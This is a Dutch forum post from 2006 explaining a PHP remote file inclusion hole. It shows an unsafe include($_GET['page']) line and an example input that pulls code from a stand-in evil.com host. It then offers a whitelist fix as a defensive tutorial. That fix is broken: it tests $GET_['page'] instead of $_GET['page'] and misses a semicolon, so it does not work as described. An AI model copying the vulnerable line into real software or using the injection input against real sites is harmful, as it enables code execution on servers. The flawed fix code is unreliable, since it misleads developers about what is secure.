door Rik » 08 mei 2006 20:48
Je doet het dan zeg maar zo:
[code="php"]include($_GET['page'] . '.php');[/code]
Maar deze manier is gigantisch onveilig,
page=http://www.evil.com/evilpage.php
Daar kunnen dus scripts staan die gevaarlijk zijn.
Daarom is er een betere manier.
Ik dacht dat het zo ging, maar ik weet het niet meer helemaal zeker.
[code="php"]// We zorgen ervoor dat we de var kunnen aanpassen.
$page = $_GET['page'];
//Kijken of er wel een pagina is ingevuldt.
if(empty($GET_['page'])){
//Nee, we geven de beginpagina
$page = 'jan'
}
//De pagina's die zijn toegestaan, dit veranderen en toevoegen als je nieuwe pagina's hebt.
$array = array('jan','piet','hein');
//Check of de pagina is toegestaan, door te kijken of hij in de array zit.
if(in_array($page, $array)){
//Include de pagina
include($page . '.php');
} else {
//De pagina zit niet in de array, maar we zeggen dat hij niet gevonden is.
echo 'Pagina niet gevonden';
}
[/code]
Bloe.